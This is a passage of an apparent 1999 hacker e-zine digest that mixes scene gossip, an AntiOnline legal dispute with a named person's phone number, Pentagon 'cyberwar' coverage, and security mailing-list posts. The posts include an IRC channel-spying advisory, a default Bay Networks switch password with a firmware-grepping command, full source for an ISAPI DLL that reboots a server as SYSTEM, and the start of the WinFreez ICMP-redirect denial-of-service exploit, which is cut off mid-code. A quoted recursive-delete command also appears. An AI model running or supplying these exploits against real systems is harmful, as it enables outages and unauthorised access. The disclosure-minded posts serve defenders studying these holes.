~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Less than a month after the very cool bikkel security site closed down demoniz has pulled the plug on his webboard which he left running after closing down the main news site. Citing DoS attacks and spam as being the #1 reasons, it turns my stomach just to think of this...pulled from help net security's site. http://net-security.org/ WEBBOARDS by deepcase, Monday 8th Mar 1999 on 1:34 pm CET Bikkel's Webboard which was first a project for a private webboard with user login and password is finally down. In an email i recieved from demoniz he said "The board is offline for good. I gave my best shot, but it didn't work. The ingoing Denial of Service attacks on our server, the spams and the threats made me so sick that I removed it. I wont provide a service for a scene which is being dominated by little kids." Net Security will think about setting up a new webboard, but we arent sure about this yet. As a side note, we've set up a 'webboard' that is published by the beseen company and it has seen no action as of yet, you might want to check it out and we can see how well it works (or doesn't as the case may be.) - Ed @HWA 03.0 AntiOnline, armed with dollars and lawyers, muscles in on Innerpulse.com ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Innerpulse.com... AntiOnline.com Threatens Legal Action Contributed by siko Thursday - March 04, 1999. 05:52PM GMT Following a rash of insults at AntiOnline.com, Founder John Vransisomething has threatened legal action against Innerpulse.com. Innerpulse has this statement for Mister AntiOnline: Talk your shit, grab your gat, call your click. But do not ever threaten Innerpulse with legal action unless you want some keys dropped.If you ain't ever been to the ghetto, you wouldn't understand the ghetto. You stay the fuck out of the ghetto. Don't try to tell me using the term 'antionline.com' is a violation of copyright laws. Its a fucking domain name. As for why we throw shit all over you name, this is a very good example of why. He went so far as to say the letter he sent me could not be reproduced without express written permission. Fuck that. You can surf on over to Innerpulse but thats all, just surf on by. It would be the biggest bitch move in Internet history to launch a legal suit at opposition just because your feelings are hurt. Stop trying to be the Microsoft of the underground community. Nothing will be removed. Nothing will be discontinued. And I don't care if someone was stupid enough to invest 60 billion in you. Why don't you go to antihell.com. Punk ass. Yeah, I posted it, What's Up Now Monkey? <link> http://innerpulse.com/jp.txt (The text from the above link appears in its entirety below - Ed) "<pre>aka Siko: I am sending you this letter to officially request that the content that relates to AntiOnline currently posted at the following URL be removed promptly: http://www.innerpulse.com/ By references in your pages, I am sure that you are aware that "AntiOnline" is a service mark in which I, Mr. John Vranesevich, hold rights to. The language used on your page is not only inflammatory, it is flat out libelous. That content, combined with references to "AntiOnline" is what has led me to write this letter. While comedic parody is a protected first amendment right, knowingly printing false, libelous information about a company, in the context of it being news, so that others may believe it to be fact, is not. We have received several e-mails from individuals questioning whether some of the information posted on your page, is factual news, or fictional writing. Also, the re-print of trademarks which are the property of another company, without written authorization, do not fall under first amendment rights. By sending you this letter, I am hoping that we can settle this matter without me being forced to seek a legal remedy. However, if you are not willing to cooperate with my requests, I may very well be forced into finding legal recourses, which may include a civil lawsuit. You will receive no further communications from me directly. If the content is not removed within 24 hours, this matter will be handed over to my legal council. Legal action may be filed shortly there after to recover damages done to AntiOnline's trade and reputation. A copy of this letter has been sent "blind carbon" to several third party individuals, so that it may be established that I have given you opportunity to remove the content voluntarily. If you have any questions regarding my request, you may contact me via an e-mail to jp@antionline.com or by phone at (724)773-0940. I would like to thank you in advance for what I hope will be a prompt response to my requests. Very Truly Yours, Mr. John Vranesevich General Partner, AntiOnline -------------------------------------------------------------------------------- This letter is copyright 1999, AntiOnline LLP Reprint without written authorization is strictly prohibited... </pre>" Our Reply to JayPee <link> http://innerpulse.com/jp-reply.txt Hi, After I saw the e-mail you sent to siko I wanted to give you my idea on this issue, as I provide web hosting for Innerpulse.com and occasionally work on the website. Response below. > aka Siko: > > I am sending you this letter to officially request that the content that > relates to AntiOnline currently posted at the following URL be removed > promptly: http://www.innerpulse.com/ If you want to send an official letter, you don't use e-mail. You can redirect official letters to our main administrative NOC at: [CubeSoft Communications] Cp2, Rr2, H.a.m Magdalen Islands, QC G0B 1K0 CANADA > By references in your pages, I am sure that you are aware that > "AntiOnline" is a service mark in which I, Mr. John Vranesevich, hold > rights to. The language used on your page is not only inflammatory, it is > flat out libelous. That content, combined with references to "AntiOnline" > is what has led me to write this letter. First of all, I think you should be consulting a lawyer about this. I did, and I can tell you that mentionning the name "AntiOnline" in a news article is not libelous; as we never even put a link to your website (which would have not been legally wrong either). Is mentionning "Microsoft" in a news article libelous? I don't think so. > While comedic parody is a protected first amendment right, knowingly > printing false, libelous information about a company, in the context of it > being news, so that others may believe it to be fact, is not. We have > received several e-mails from individuals questioning whether some of the > information posted on your page, is factual news, or fictional writing. We don't want to take responsibility of the stupidity of your website's visitors. Tell them to redirect their comments and question to contact@innerpulse.com. My personal opinion is that it is quite obvious whether an article is true or not; Innerpulse adds a touch of humor to it, that's what makes Innerpulse different. > Also, the re-print of trademarks which are the property of another > company, without written authorization, do not fall under first amendment > rights. Ahh I'm beginning to think you are referring to `AntiOnline-O-Rama' from the INN features section. Do you seriously think I would have wasted my time recopying AntiOnline's frontpage entirely? This may be not in the scope of your technical skills, but that is actually a link to a CGI script which simply acts as a proxy - it prints information directly from AntiOnline.com, doing some word search/replaces in the process. By changing the parameter you can do the same with any other website. > By sending you this letter, I am hoping that we can settle this matter > without me being forced to seek a legal remedy. However, if you are not > willing to cooperate with my requests, I may very well be forced into > finding legal recourses, which may include a civil lawsuit. You will > receive > no further communications from me directly. If the content is not removed > within 24 hours, this matter will be handed over to my legal council. > Legal action may be filed shortly there after to recover damages done to > AntiOnline's trade and reputation. I've been in that situation before, just an advice: don't even think about this, this will pass as a violation of free speech. And by the way, who do you want to sue exactly? > A copy of this letter has been sent "blind carbon" to several third party > individuals, so that it may be established that I have given you > opportunity to remove the content voluntarily. I don't think so, John. > If you have any questions regarding my request, you may contact me via an > e-mail to jp@antionline.com or by phone at (724)773-0940. > > I would like to thank you in advance for what I hope will be a prompt > response to my requests. > > Very Truly Yours, > Mr. John Vranesevich > General Partner, AntiOnline @HWA 03.1 The FPSC-IRCD.txt advisory. ~~~~~~~~~~~~~~~~~~~~~~~~~~~ The FPSC-IRCD.txt advisory. --------------------------- By: syg of the FPSC @3/7/98 ircd@FPSC.hemp.net http://FPSC.hemp.net Program affected: IRCD Versions affected: All hybrid and other EFnet IRCD versions. Probably others. Problem: According to the date of this file, thier is a few bugs in hybrid IRCD and maybe others. I've checked DALnet's source and it seems thiers is fixed and not affected. The bug is in match.c of the source code and starts on line 204 at 'tolowertab[]'. Note the line that consists of the following: "'t', 'u', 'v', 'w', 'x', 'y', 'z', '{', '|', '}', '~',". Then go to line 238 in match.c to 'touppertab[]'. Note the line that reads: "'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '[', '\\', ']', '^'," and look at the two lines. If you notice, it takes the '{' char and defines its uppercase char as '[' as along with defining '|' to '\', '}' to ']', and '~' to '^'. What this means is thier the same characters in channel names and nicknames. Now what can you do with this in such a way it would be a problem? You can spy on channels that consist of any one of those 8 characters below: 1) { --Defined as LowerCase [ 2) [ --Defined as UpperCase { 3) } --Defined as LowerCase ] 4) ] --Defined as UpperCase } 5) | --Defined as LowerCase \ 6) \ --Defined as UpperCase | 7) ~ --Defined as LowerCase ^ 8) ^ --Defined as UpperCase ~ This problem and mIRC make a dangerous combination. Lets say a bunch of your friends hang in #mIRC] and you run BitchX. All you have to do is join #mIRC} and thier mIRC clients wont see you join the channel which means you are a ghost and therefore are invisible. Another example would be... two people are in #Love^2 and you ran BitchX. All you would have to do is join #Love~2 and they wont see you join, therefore you can spy on thier conversation all night long. Now if one of the mIRC people happened to type "/names #mIRC]" or "/names #Love^2" you would magically pop up in the nick list of the channel. That is also the same if someone joins the channel after you have joined, you will show up in thier names list therefore it will put you in thier nick list in the channel window. Be creative and have fun. Logs: The "->->->" is me telling you whats going on. ->->-> In mIRC I typed /join #[ with the nick mIRC-1 *** Now talking in #[ ->->-> No one is in the channel but me in the nick list. ->->-> Then I looked in my status window and got the join info. #[ @mIRC-1 #[ End of /NAMES list. #[ created on Thu Feb 25 14:13:45 ->->-> Then in another mIRC client I typed /join #{ with the nick mIRC-2 *** Now talking in #{ ->->-> No one is in the channel but me in the nick list. ->->-> Then I looked in my status window and got the join info. #[ mIRC-2 @mIRC-1 #{ End of /NAMES list. #[ + #[ created on Thu Feb 25 14:13:45 ->->-> NOTE: I can't see mIRC-1 in the nick list in the channel. ->->-> I also can't see mIRC-2 in mIRC-1's nick list. ->->-> So basically it's like two different channels when you are in mIRC. ->->-> Let's now bring bitchX into play... ->->-> In BitchX under the nick BitchX-1 i typed /join #[ BitchX-1 [test@FPSC.hemp.net] has joined #[ [Users(#[:3)] [ BitchX-1 ] [ mIRC-2 ] [@mIRC-1 ] Channel #[ was created at Thu Feb 25 14:13:45 1999 BitchX: Join to #[ was synced in 0.391 secs! ->->-> Now under mIRC-1's client I saw... *** BitchX-1 (test@FPSC.hemp.net) has joined #[ ->->-> Which I should have because we are both in #[ ->->-> But on the other hand, under mIRC-2's client( The one in #{ )... ->->-> I didn't see BitchX-1 join. ->->-> And as you can see, BitchX-1 see's mIRC-2 in the channel #[ ->->-> Now let me type with all three of them. ->->-> Under all three clients I will type thier nick and chan to the channel. ->->-> Under BitchX-1's client I saw all three clients talk... <mIRC-1> mIRC-1 #[ <mIRC-2> mIRC-2 #{ <BitchX-1> BitchX-1 #[ ->->-> Under mIRC-1's client I saw myself and BitchX-1 type (We are both in #[) <mIRC-1> mIRC-1 #[ <BitchX-1> BitchX-1 #[ ->->-> Under mIRC-2's client I saw myself type only ( Im in #{ ) <mIRC-2> mIRC-2 #{ ->->-> As you can see mIRC-2 is being spy'd on by the BitchX client. ->->-> End of logs. Sollution: The fix would be to simply edit /src/match.c of the source code. DALnet seems to have a nice match.c at ftp.dal.net in df467.tgz if you EFnet staff need any ideas. We all hope to see this fixed in your next release of hybrid. Final Notes: IRCD coders and staff members of all networks and all IRCD versions need to check your source for this bug and fix it before it gets abused... maybe it was you in #^locals^ giving your phone number out to a friend which was being spy'd on by another local enemy. Other than that, everyone keep up the good work and so long. Also, thanks to sate for helping me test this out. Questions/jobs/info/etc: ircd@FPSC.hemp.net -syg @HWA 04.0 Pentagon under attack ~~~~~~~~~~~~~~~~~~~~~ March 7th, 1999 From http://www.hackernews.com/ Pentagon investigates Russian cyberattacks contributed to HNN by Bronc A probe has been launched into recent efforts of crackers attempting to access Pentagon computer systems. Pentagon officials are unsure if this is a coordinated attack or the work of separate individuals. Early indications show that many of the attacks have originated in Russia and may have had the assistance of a insider. No classified networks have yet been breached. U.S. Deputy Defense Secretary John Hamre has been quoted as saying "It is a major concern." (Ed Note: This is the same John Hamre who last year was quoted as saying "This is the most coordinated attack we have seen to date" when referring to attacks on government systems by three teenagers.) Follow up here: http://abcnews.go.com/sections/world/DailyNews/pentagonrussia990304.html http://www.techserver.com/story/body/0,1634,24763-40126-294330-0,00.html http://www.msnbc.com/news/246801.asp http://www.smh.com.au/news/9903/05/breaking2/news1.html And from Innerpulse.com; www.innerpulse.com United States: Cyberwar? Contributed to Innerpulse by siko Sunday - March 07, 1999. 06:10PM GMT Innerpulse has decided not to join the media inflated 'Cyberwar' reporting until today. We have been doing extensive research and have discovered some exclusive details. We all know the so called 'facts'. Coordinated attacks on certain servers have officials at the Pentagon looking for answers, and quickly. What certain people forget, is that the man who said this is the most organized attack to date, is also the man that said a 16 year old kid named 'Makeveli' had also launched an extremely organized attack on government servers. For those who aren't into the urban musical subculture, Makeveli most likely came from the popular rapper, Tupac's influence. They have stated the attacks are coming from Canada and Thailand amongst others. Yet they can not trace any further. Sorry, if you can tell the country than you have the IP, and the ability to find the source. The United States is not at Cyberwar with anyone but the media, who took a couple of failed hack attempts and turned it into World War III. Innerpulse has conducted various interviews and can now finger the source of this terror. His name is John Vranesevich, which traces back to packetz.antionline.com. In an effort to get more publicity for breaking a story, he blew up a situation leading many respected news outlets into believeing this was actually as blown out of proportion as he made it sound. And on top of that, they pick Hamre, the man who called an Undernet hacker named 'Makeveli', a serious threat the the United States National Security. The Pentagon may be experiencing more attacks lately. This is not blown out of proportion. But if you take a moment to question the motives of people who would attempt to crack into a government server.. Perhaps because it gains you recognition and fame as it has done for so many in the past? This is the same reason antionline.com gets lots of crack attempts every day, because almost everyone in the 'hacker' community wants to be known for breaking the site that sold out. The United States is not currently involved in a Cyber War, never has been, and most likely will not be in any of our reader's lifetimes. But, if someone really cracks a Pentagon server and fires a missile at me, boy won't I feel silly. And a fairly intelligent article with little FUD from ABC news... http://www.abcnews.go.com/sections/tech/DailyNews/pentahack990309.html Pentagon Attacks Overblown? Hackers Complain Government Computers Over-Sensitive By Michael J. Martinez ABCNEWS.com March 9 Last week, the Pentagon reported that over the last several months its computer systems have withstood an unprecedented and concerted series of external attacks. U.S.-based hackers might simulate an attack from abroad by routing their signals through a series of far-flung servers. (ABCNEWS.com) Deputy Defense Secretary John Hamre confirmed the attacks, calling them a major concern. Pentagon officials stated that the electronic infiltrations have come from abroad most likely Russia. To Pentagon watchers, and to members of the loosely knit hacker fraternity in the United States, those claims sounded familiar. Terrorists or Teens? Last February, Hamre announced that the Pentagon was undergoing the most intense, coordinated cyberattack it had ever seen. Over a two-week period, unknown hackers launched coordinated attacks against hundreds of military domains and servers. After weeks of investigation, the culprits were nabbed. They turned out to be an 18-year-old Israeli computer enthusiast with a lot of time on his hands, and two teenagers from California who were using readily available software tools downloaded from the Internet to discredit the Pentagon�s computer security. No hackers claimed credit for the latest assaults; there was no bragging in IRC chat rooms or on Web pages, as typically happens after well-publicized computer attacks on government systems. That could mean a number of different things, says Dr. Peter Tippett, president of ISCA, Inc., a computer security firm. The attacks aren�t that bad, the person doing it doesn�t want to take credit, or the attacks are coming from overseas. The latest assaults could have come from foreign governments, terrorist organizations or from the proverbial mischievous teenager. Recon vs. Frontal Assault What exactly constitutes an attack? Hackers customarily scan remote computer systems, looking for security holes through which to send or retrieve data. Tools for such scans are readily available for downloading from the Internet. These scanners basically take known holes and hit a server, one after another, asking it if these holes are open, says an independent hacker known as Bronc Buster. They may or may not be there, but as far as logs on systems will show, unless you are an experienced admin and can tell the difference, you are being attacked. The Pentagon, however, does not differentiate between scans, which is essentially cyberspace reconnaissance, and full attacks, when a malicious system cracker actively attempts to break through security. Tippett points out that scans are useful for later attack, and that determined hackers have found ways to conduct scans without setting off alarms. Most servers have thousands of accounts, and thus thousands of entry points. If a hacker takes his time, and only pings a few entry points every so often, he can usually avoid notice. In recent congressional testimony, Hamre said Defense Department computers are attacked upwards of 60 times per week, with about 10 such attacks requiring additional investigation. He did not differentiate between scans or infiltration attempts. From Russia With Love The theory that the recent attacks came from Russia is also questionable. When it comes to the Internet, geography quickly becomes irrelevant. Hacking tools, some of which are readily available online, could allow a would-be hacker to fake his own locale information, or channel his attack through servers all around the world. I don�t know how the Pentagon would know where the attacks come from, Tippett says. If you have access to enough servers, it�s relatively easy to re-route your connection to make it appear you�re in Russia, when you could just be down the street. Rep. Curt Weldon, R-Pa., who chairs the subcommittee of the House Armed Services Committee where Hamre testified, acknowledges that the starting point of the recent computer assaults still in doubt. But he contends the new attacks represent a new kind of warfare, in which less powerful nations could gain an edge against the United States by hacking into and knocking out key computer systems. This appears to be a coordinated effort to break into our computer system, and we not giving the problem the kind of visibility it needs, Weldon says. This Y2K thing is a piece of cake compare to this. OXBlood Ruffin, foreign minister for the hacker group Cult of the Dead Cow, has another view. It smells like someone is looking for increased budgets, Ruffin wrote in an e-mail, calling Hamre�s alarms a typical crying game from the military. �Hacking� Into a Government Computer According to a Philadelphia-based hacker who calls himself El Diablo, government computers are far too quick to register an attack. El Diablo, affiliated with the HologramNation hacker group, should know: he accessed the White House Web server. Instead of using a a Web browser, El Diablo accessed the whitehouse.gov host address via Telnet. Telnet is a common way for a user to log directly into a server, accessing the server�s systems remotely. Once dialed in, El Diablo encountered the following warning: You are about to access a U.S. Government computer system. Access to this system is restricted to authorized users only. Anyone who accesses this system without authorization, or exceeds authorized access, could be subject to a fine or imprisonment, or both, under Public Law 98-473. The message went on to say that the user was being monitored. The computer then asked for a username and password, at which point El Diablo exited. What this seems to say is that I just �hacked� into the government computers, he says. The hackers [accessing Pentagon computers] could have simply done that, and the government could have blown this waaaaaay out of proportion. Many people Telnet into their work computers it�s not some obscure hacker tool. Yet the White House says what El Diablo did is a potential attack. I�m sure lots of people Telnet into that server, either to just have a look, or they access it by mistake, and that�s OK, said White House spokesman Mark Kitchens. But that is still considered an attempt at breaching security. @HWA 04.1 Passwords visible in plaintext in Cheyenne's Anti-Virus Agent for Exchange. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Fri, 5 Mar 1999 12:19:59 -0800 From: JEK <jkolde@EARTHLINK.NET> To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: Cheyenne InocuLAN for Exchange plain text password still there This dates back to Ron Watkins' post on 12/16/98 regarding the plain text account name/password left in the exchverify.log file by the installation of Cheyenne's Anti-Virus Agent for Exchange. Quote from Ron: "I was called on Monday by Brian Linton at Computer Associates. He says that the plaintext admin password was put into c:\exchverify.log by earlier versions of the Arcserve Exchange client, but that build 57 (the most recent version) puts only the length there. It does not erase that file as new installs are done, but rather appends, which is why some folks still had that plaintext password even after installing the most recent build." I am currently testing AV Agent for Exchange and installed what I was told was the most recent version (build 64) on a clean NT 4.0/SP4/Exchange 5.5 server running InocuLAN for NT 4.0 (build 375). This was a fresh build and *not* upgraded from earlier versions of any software. The exchverify.log file is still there and still contains the account name and password in clear text - NOT merely the length as stated above. JEK, MCSE @HWA 04.2 Default passwords in Bay networks switches ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Wed, 10 Mar 1999 14:48:58 -0800 From: Jan B. Koum <jkb@BEST.COM> To: BUGTRAQ@netspace.org Subject: Default password in Bay Networks switches. Ok.. so you would think after 3Com $%#& up last year of inserting default password into firmware vendors would learn their lesson? [See http://geek-girl.com/bugtraq/1998_2/0340.html for 3com rant] Hah! Welcome to the world of strings and Bay Networks firmware files. I have looked at some bay networks switches and see that the following have default password of "NetICs" BayStack 350T HW:RevC FW:V1.01 SW:V1.2.0.10 BayStack 350T HW:RevC FW:V1.01 SW:V2.0.0.15 These however I was not able to find defaults for: BayStack 350-24T HW:RevA FW:V1.04 SW:V1.0.0.2 Bay Networks BayStack 303 Ethernet Switch BayStack 28115/ADV Fast Ethernet Switch If you have firmware images for the above, just % strings *.img | grep -B5 "Invalid Password" Something similar to this command might give you the passwd. Of course I don't have to tell you about how bad it is when someone can control your network infrastructure (switches). I don't have much experience with Bay hardware (in fact, I have none - someone at work just asked me to help them get into a switch for which they forgot the password). If someone can shed some light on this topic, it would be great. And yes, I consider this to be a backdoor - wouldn't you call it a backdoor if Solaris had default password for root logins? How can vendors in 1999 even THINK about something as stupid as inserting a default password like this into a switch!?!? Granted - I am almost sure Bay didn't have evil intentions for the use .. but still. I am speechless. -- Yan P.S. - Greetz to the inhabitants of #!adm and #!w00w00 ------------------------------------------------------------------------------ Date: Wed, 10 Mar 1999 17:06:05 -0700 From: Dax Kelson <dkelson@INCONNECT.COM> To: BUGTRAQ@netspace.org Subject: Re: Default password in Bay Networks switches. On Wed, 10 Mar 1999, Jan B. Koum wrote: > Ok.. so you would think after 3Com $%#& up last year of inserting > default password into firmware vendors would learn their lesson? > [See http://geek-girl.com/bugtraq/1998_2/0340.html for 3com rant] > > Hah! Welcome to the world of strings and Bay Networks firmware > files. I have looked at some bay networks switches and see that > the following have default password of "NetICs" The Bay Networks case number for this bug/oversight is: 990310-614 Normally "backdoor" passwords on Bay gear only work through the console. Dax Kelson Internet Connect, Inc. ------------------------------------------------------------------------------ Date: Wed, 10 Mar 1999 17:16:53 -0800 From: Jon Green <jogreen@NORTELNETWORKS.COM> To: BUGTRAQ@netspace.org Subject: Re: Default password in Bay Networks switches. > And yes, I consider this to be a backdoor - wouldn't you call it > a backdoor if Solaris had default password for root logins? > How can vendors in 1999 even THINK about something as stupid as > inserting a default password like this into a switch!?!? > Granted - I am almost sure Bay didn't have evil intentions for > the use .. but still. I am speechless. This was fixed in version 2.0.3.4 of the BS350 code last November. The backdoor is still there for console access, but not for telnet. This problem only affected the Baystack 350T and 350F, it did not affect the 350-24T or 450. Also, note that the 350 has always had the ability to limit telnet logins to certain source addresses; it is recommended that that feature be used. Software upgrades for the 350 can be found at http://support.baynetworks.com under Software. If you don't have a support contract, call (800) 2LANWAN. -Jon ------------------------------------------------------------------- Jon Green 4301 Great America Pkwy Senior Competitive Test Engineer Santa Clara, CA 95054 Nortel Networks (408) 495-2618 Voice jogreen@nortelnetworks.com (408) 495-4540 Fax ------------------------------------------------------------------- @HWA 04.3 ISAPI Exploit code ~~~~~~~~~~~~~~~~~~ Date: Tue, 9 Mar 1999 10:54:47 -0500 From: Fabien Royer <fabienr@BELLATLANTIC.NET> To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: Re: ISAPI Extension vulnerability allows to execute code as SYSTEM > -----Original Message----- > From: Patrick CHAMBET [mailto:pchambet@club-internet.fr] > Sent: Tuesday, March 09, 1999 5:27 AM > To: Fabien Royer > Cc: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM > Subject: Re: ISAPI Extension vulnerability allows to execute code as > SYSTEM > > > Any proof ? Any sample ? Any work around ? > How can we test our servers ? Using VC++, create an ISAPI extension project and call it CRbExtension. Replace GetExtensionVersion() and Default() with the code below. Compile it to something simple, like rb.dll. Place it on your web server and invoke it from your browser like this http://your.machine.name/scripts/rb.dll? Note: if you are using IE4.0, don't call this from the machine that is running the web server otherwise, the next time you log in, IE will recall the last URL and you'll reboot again. The workaround is to NEVER give users (or customers) the ability to use ISAPI extensions if you allow them to upload CGIs to customize their home page. An .exe on the other hand is much safer (is coded correctly). Fabien. BOOL CRbExtension::GetExtensionVersion(HSE_VERSION_INFO* pVer) { HANDLE hToken; // handle to process token TOKEN_PRIVILEGES tkp; // pointer to token structure // Get the current process token handle so we can get shutdown // privilege. OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken); // Get the LUID for shutdown privilege. LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &tkp.Privileges[0].Luid); tkp.PrivilegeCount = 1; // one privilege to set tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; // Get shutdown privilege for this process. AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN_PRIVILEGES) NULL, 0); ExitWindowsEx(EWX_REBOOT,0); // Disable shutdown privilege. tkp.Privileges[0].Attributes = 0; AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN_PRIVILEGES) NULL, 0); // Call default implementation for initialization CHttpServer::GetExtensionVersion(pVer); // Load description string TCHAR sz[HSE_MAX_EXT_DLL_NAME_LEN+1]; ISAPIVERIFY(::LoadString(AfxGetResourceHandle(),IDS_SERVER, sz,HSE_MAX_EXT_DLL_NAME_LEN)); _tcscpy(pVer->lpszExtensionDesc, sz); return TRUE; } void CRbExtension::Default(CHttpServerContext* pCtxt) { StartContent(pCtxt); WriteTitle(pCtxt); *pCtxt << _T("Reboot<br>"); EndContent(pCtxt); } > > Patrick Chambet > IBM Global Services > > > >There's a vulnerability in IIS (and other WEB servers executing > as SYSTEM) > >that allows to execute an ISAPI extension in the security context of the > >server itself instead of the security context of IUSR_WHATEVER. > How is this > >possible: when the server loads an ISAPI extension the first > time, it calls > >GetExtensionVersion(). During the call to this function, an attacker can > >execute any code as SYSTEM. This is a problem if you're an ISP doing > hosting > >with web servers offering ISAPI support (IIS, Apache 1.3.4, etc. > ) because > >any user allowed to place a "CGI" on the server can take over. Of course, > >this problem is not limited to ISPs. > >Fabien. -=- Prior Discussion & further details ; Date: Mon, 8 Mar 1999 11:27:48 -0500 From: Fabien Royer <fabienr@BELLATLANTIC.NET> To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: ISAPI Extension vulnerability allows to execute code as SYSTEM There's a vulnerability in IIS (and other WEB servers executing as SYSTEM) that allows to execute an ISAPI extension in the security context of the server itself instead of the security context of IUSR_WHATEVER. How is this possible: when the server loads an ISAPI extension the first time, it calls GetExtensionVersion(). During the call to this function, an attacker can execute any code as SYSTEM. This is a problem if you're an ISP doing hosting with web servers offering ISAPI support (IIS, Apache 1.3.4, etc. ) because any user allowed to place a "CGI" on the server can take over. Of course, this problem is not limited to ISPs. Fabien. -------------------------------------------------------------------------------- Date: Tue, 9 Mar 1999 00:32:03 -0500 From: Fabien Royer <fabienr@BELLATLANTIC.NET> To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: Re: ISAPI Extension vulnerability allows to execute code as SYSTEM > -----Original Message----- > From: Scott L. Krabler [mailto:scottk@visi.com] > Sent: Monday, March 08, 1999 11:41 PM > To: Fabien Royer; NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM > Subject: RE: ISAPI Extension vulnerability allows to execute code as > SYSTEM > > > By this, I'm assuming the required safeguard would be to only implement > ISAPI filters whose contents are known. Since ISAPI filters can only be Typically, filters and extensions fulfill different purposes. For instance, you would not implement an complete WEB based application as a filter for performance reasons. Filters see all http "traffic" while extensions only see the http traffic that is directed to them. Unless you have written the filter yourself (or someone trusted in your organization), you can't know if a filter is 100% secure either. > installed locally(?) there shouldn't be any general risk. Yes? This is not that simple. You can remotely install a filter under IIS if you can cause the following sequence of events to occur: 1) Place the filter .dll in a location accessible from the web server. 2) Update the registry to register the new filter. 3) Cause a reboot of the machine or stop/start IIS. All of this can be done from the GetExtensionVersion() call mentioned earlier. Finally, you can host a filter *AND* an extension in the same .dll. Fabien. > > -----Original Message----- > From: Windows NT BugTraq Mailing List > [mailto:NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM]On Behalf Of Fabien Royer > Sent: Monday, March 08, 1999 10:28 AM > To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM > Subject: ISAPI Extension vulnerability allows to execute code as SYSTEM > > > There's a vulnerability in IIS (and other WEB servers executing as SYSTEM) > that allows to execute an ISAPI extension in the security context of the > server itself instead of the security context of IUSR_WHATEVER. > How is this > possible: when the server loads an ISAPI extension the first > time, it calls > GetExtensionVersion(). During the call to this function, an attacker can > execute any code as SYSTEM. This is a problem if you're an ISP > doing hosting > with web servers offering ISAPI support (IIS, Apache 1.3.4, etc. ) because > any user allowed to place a "CGI" on the server can take over. Of course, > this problem is not limited to ISPs. > Fabien. > -------------------------------------------------------------------------------- Date: Wed, 10 Mar 1999 18:28:24 -0500 From: Fabien Royer <fabienr@BELLATLANTIC.NET> To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: Re: ISAPI Extension vulnerability allows to execute code as SYSTEM Sure, however the executable that you are going to execute will run in a separate address space and if it is spawned by IIS, it will run in the security context of IUSR_xxx instead of SYSTEM. This is the *major* difference between what you can do with the .dll approach and the .exe approach. Fabien. > I don't know that .EXE's are that much safer. How about this: > > I upload 4nt.exe (Command.Com/CMD.Exe replacement program) > I write an EXE that calls it and runs the command 'reboot' > or even a 'del /zsx c:\*.*' (Which will recursively delete all > files that aren't currently in use) > > Same idea ... different way about it. > > Being a developer and having the tools available, I require that > I get to compile the code myself. That way, I can scan through > the code to see if it's trying to do anything malicious. > Granted, this isn't 100% foolproof, but it does help! > > Charlie @HWA 04.4 Winfreez.c new exploit code for win9x and NT ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The full original source code is followed by a Solaris version and further discussion, from Packetstorm/Bugtraq. (March 11th 1999) http://www.genocide2600.com/~tattooman/new.shtml#latest /* WinFreez.c by Delmore <delmore@moscowmail.com> ICMP/Redirect-host message storm freeze Win9x/NT(sp4) box in LAN. Usage: winfreez sendtoip sendfromip time where <sendtoip> is victim host, <sendfromip> is router for victim host, <time> is time in seconds to freeze victim. Note: I've written small exploit for freeze win9x/nt boxes in LAN. Proggy initiates ICMP/Redirect-host messages storm from router (use router ip). Windows will receive redirect-host messages and change own route table, therefore it will be frozen or slowly working during this time. On victim machine route table changes viewing with: ROUTE PRINT command in ms-dos box. Exploit show different result for different system configuration. System results: p200/16ram/win95osr2 is slowly execute application after 20 seconds of storm. p233/96ram/nt4-sp4 is slowly working after 30 seconds of storm. p2-266/64ram/win95 working slowly and can't normal execute application. Compiled on RedHat Linux 5, Kernel 2.0.35 (x86) gcc ./winfreez.c -o winfreez --- for Slackware Linux, Kernel 2.0.30 If you can't compile due to ip_sum not defined errors, replace (line 207): ip->ip_sum = 0; to line: ip->ip_csum = 0; --- Soldiers Of Satan group Russia, Moscow State University, 05 march 1999 http://sos.nanko.ru Thanx to Mark Henderson. */ #include <stdio.h> #include <stdlib.h> #include <time.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <netdb.h> #include <netinet/in.h> #include <netinet/in_systm.h> #include <netinet/ip.h> #include <netinet/ip_icmp.h> /* * Structure of an icmp header (from sparc header). */ struct icmp { u_char icmp_type; /* type of message, see below */ u_char icmp_code; /* type sub code */ u_short icmp_cksum; /* ones complement cksum of struct */ union { u_char ih_pptr; /* ICMP_PARAMPROB */ struct in_addr ih_gwaddr; /* ICMP_REDIRECT */ struct ih_idseq { n_short icd_id; n_short icd_seq; } ih_idseq; int ih_void; } icmp_hun; #define icmp_pptr icmp_hun.ih_pptr #define icmp_gwaddr icmp_hun.ih_gwaddr #define icmp_id icmp_hun.ih_idseq.icd_id #define icmp_seq icmp_hun.ih_idseq.icd_seq #define icmp_void icmp_hun.ih_void union { struct id_ts { n_time its_otime; n_time its_rtime; n_time its_ttime; } id_ts; struct id_ip { struct ip idi_ip; /* options and then 64 bits of data */ } id_ip; u_long id_mask; char id_data[1]; } icmp_dun; #define icmp_otime 